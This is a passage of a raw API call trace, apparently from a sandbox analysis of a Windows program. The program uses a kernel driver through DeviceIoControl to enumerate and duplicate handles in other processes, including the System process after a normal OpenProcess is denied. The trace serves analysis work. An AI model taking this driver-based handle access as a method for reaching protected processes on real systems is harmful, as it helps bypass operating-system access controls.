0x0 [0116.797] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.797] PsReleaseProcessExitSynchronization () returned 0x2 [0116.798] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x3a [0116.798] ObQueryNameString (in: Object=0xfffffa8003a7bd70, ObjectNameInfo=0xfffffa80027ff044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027ff044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.798] ObfDereferenceObject (Object=0xfffffa8003a7bd70) returned 0x2 [0116.798] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.798] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.798] CloseHandle (hObject=0xc8) returned 1 [0116.798] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0116.798] GetCurrentProcess () returned 0xffffffffffffffff [0116.798] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0116.798] CloseHandle (hObject=0xc8) returned 1 [0116.798] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ccb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2ccb50*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0116.798] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880051635a8 | out: Process=0xfffff880051635a8) returned 0x0 [0116.798] PsAcquireProcessExitSynchronization () returned 0x0 [0116.798] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635c8) [0116.798] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff880051635b0, HandleInformation=0x0 | out: Object=0xfffff880051635b0*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0116.798] PsReleaseProcessExitSynchronization () returned 0x2 [0116.798] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0116.798] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880051635a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880051635a4) returned 0xc0000004 [0116.798] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a002babd50 [0116.798] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a002babd50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a002babd50, ReturnLength=0x0) returned 0x0 [0116.798] ExFreePoolWithTag (P=0xfffff8a002babd50, Tag=0x0) [0116.798] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0116.798] KeUnstackDetachProcess (ApcState=0xfffff880051635c8) [0116.798] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.798] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.798] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.798] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.799] PsAcquireProcessExitSynchronization () returned 0x0 [0116.799] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0116.799] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0116.799] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.799] PsReleaseProcessExitSynchronization () returned 0x2 [0116.799] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0116.799] ObQueryNameString (in: Object=0xfffffa80039b2ef0, ObjectNameInfo=0xfffffa8002802044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002802044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.799] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0116.799] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.799] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.799] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0116.799] GetCurrentProcess () returned 0xffffffffffffffff [0116.799] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0116.799] CloseHandle (hObject=0xc8) returned 1 [0116.799] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2ccb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2ccb50*, lpBytesReturned=0x12d450*=0x1c, lpOverlapped=0x0) returned 1 [0116.799] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880051635a8 | out: Process=0xfffff880051635a8) returned 0x0 [0116.799] PsAcquireProcessExitSynchronization () returned 0x0 [0116.799] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635c8) [0116.799] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff880051635b0, HandleInformation=0x0 | out: Object=0xfffff880051635b0*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0116.799] PsReleaseProcessExitSynchronization () returned 0x2 [0116.799] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0116.799] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880051635a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880051635a4) returned 0xc0000004 [0116.799] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a002babd50 [0116.799] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a002babd50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a002babd50, ReturnLength=0x0) returned 0x0 [0116.799] ExFreePoolWithTag (P=0xfffff8a002babd50, Tag=0x0) [0116.799] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0116.799] KeUnstackDetachProcess (ApcState=0xfffff880051635c8) [0116.799] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.800] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.800] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.800] PsAcquireProcessExitSynchronization () returned 0x0 [0116.800] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0116.800] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0116.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.800] PsReleaseProcessExitSynchronization () returned 0x2 [0116.800] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0116.800] ObQueryNameString (in: Object=0xfffff8a001057e80, ObjectNameInfo=0xfffffa8002804044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002804044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.800] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0116.800] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.800] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0116.800] GetCurrentProcess () returned 0xffffffffffffffff [0116.800] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x9b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.800] CloseHandle (hObject=0xc8) returned 1 [0116.800] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.800] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x70) returned 0x2b4c50 [0116.800] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.800] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0116.800] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.800] PsAcquireProcessExitSynchronization () returned 0x0 [0116.800] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880051635d0) [0116.800] ObReferenceObjectByHandle (in: Handle=0x9b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037acce0, HandleInformation=0x0) returned 0x0 [0116.801] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.801] PsReleaseProcessExitSynchronization () returned 0x2 [0116.801] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1d9 [0116.801] ObQueryNameString (in: Object=0xfffffa80037acce0, ObjectNameInfo=0xfffffa8002805044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002805044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.801] ObfDereferenceObject (Object=0xfffffa80037acce0) returned 0x5 [0116.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.801] CloseHandle (hObject=0xc4) returned 1 [0116.801] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x338) returned 0xc4 [0116.801] GetCurrentProcess () returned 0xffffffffffffffff [0116.801] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0116.801] CloseHandle (hObject=0xc4) returned 1 [0116.801] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.801] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x90) returned 0x2b4820 [0116.801] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x2b4820, ObjectInformationLength=0x90, ReturnLength=0x0 | out: ObjectInformation=0x2b4820, ReturnLength=0x0) returned 0x0 [0116.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4820 | out: hHeap=0x290000) returned 1 [0116.801] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.801] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.801] PsAcquireProcessExitSynchronization () returned 0x0 [0116.801] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880051635d0) [0116.801] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003674a60, HandleInformation=0x0) returned 0x0 [0116.801] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.801] PsReleaseProcessExitSynchronization () returned 0x2 [0116.801] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0116.801] ObQueryNameString (in: Object=0xfffffa8003674a60, ObjectNameInfo=0xfffffa8002808044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002808044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.801] ObfDereferenceObject (Object=0xfffffa8003674a60) returned 0x2 [0116.802] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.802] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.802] CloseHandle (hObject=0xc8) returned 1 [0116.802] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0116.802] GetCurrentProcess () returned 0xffffffffffffffff [0116.802] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.802] CloseHandle (hObject=0xc8) returned 1 [0116.802] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.802] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.802] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.802] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.802] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0116.802] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.802] PsAcquireProcessExitSynchronization () returned 0x0 [0116.802] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff880051635d0) [0116.802] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80018b5f40, HandleInformation=0x0) returned 0x0 [0116.802] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.802] PsReleaseProcessExitSynchronization () returned 0x2 [0116.802] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x3f [0116.802] ObQueryNameString (in: Object=0xfffffa80018b5f40, ObjectNameInfo=0xfffffa8002809044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002809044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.802] ObfDereferenceObject (Object=0xfffffa80018b5f40) returned 0xc [0116.802] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.802] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.802] CloseHandle (hObject=0xc4) returned 1 [0116.802] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0xc4 [0116.803] GetCurrentProcess () returned 0xffffffffffffffff [0116.803] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0116.803] CloseHandle (hObject=0xc4) returned 1 [0116.803] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.803] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2ccb50 [0116.803] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x2ccb50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2ccb50, ReturnLength=0x0) returned 0x0 [0116.803] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ccb50 | out: hHeap=0x290000) returned 1 [0116.803] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0116.803] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.803] PsAcquireProcessExitSynchronization () returned 0x0 [0116.803] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0116.803] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a004498db0, HandleInformation=0x0) returned 0x0 [0116.803] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.803] PsReleaseProcessExitSynchronization () returned 0x2 [0116.803] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0116.803] ObQueryNameString (in: Object=0xfffff8a004498db0, ObjectNameInfo=0xfffffa800280a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280a044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.803] ObfDereferenceObject (Object=0xfffff8a004498db0) returned 0x3 [0116.803] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.803] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.803] CloseHandle (hObject=0xc8) returned 1 [0116.803] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0116.803] GetLastError () returned 0x5 [0116.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0116.803] ZwOpenProcess (in: ProcessHandle=0xfffffa80025f40c0, DesiredAccess=0x10000000, ObjectAttributes=0xfffff88005163688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88005163678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa80025f40c0*=0xc8) returned 0x0 [0116.803] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0116.803] ZwOpenProcess (in: ProcessHandle=0xfffff880051635f0, DesiredAccess=0x40, ObjectAttributes=0xfffff88005163608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880051635f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880051635f0*=0xffffffff800005a4) returned 0x0 [0116.804] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff800005a4, SourceHandle=0x42c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa80025f40c0, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa80025f40c0*=0xc4) returned 0x0 [0116.804] ZwClose (Handle=0xffffffff800005a4) returned 0x0 [0116.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.804] CloseHandle (hObject=0xc8) returned 1 [0116.804] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.804] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.804] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.804] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.804] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.804] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.804] PsAcquireProcessExitSynchronization () returned 0x0 [0116.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.804] ObReferenceObjectByHandle (in: Handle=0xffffffff8000042c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039086d0, HandleInformation=0x0) returned 0x0 [0116.804] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.804] PsReleaseProcessExitSynchronization () returned 0x2 [0116.804] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.804] ObQueryNameString (in: Object=0xfffffa80039086d0, ObjectNameInfo=0xfffffa800280b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280b044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.804] ObfDereferenceObject (Object=0xfffffa80039086d0) returned 0x5 [0116.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.804] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.804] CloseHandle (hObject=0xc4) returned 1 [0116.804] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0116.804] GetLastError () returned 0x5 [0116.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0116.804] ZwOpenProcess (in: ProcessHandle=0xfffffa80025f40c0, DesiredAccess=0x10000000, ObjectAttributes=0xfffff88005163688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88005163678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa80025f40c0*=0xc4) returned 0x0 [0116.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0116.805] ZwOpenProcess (in: 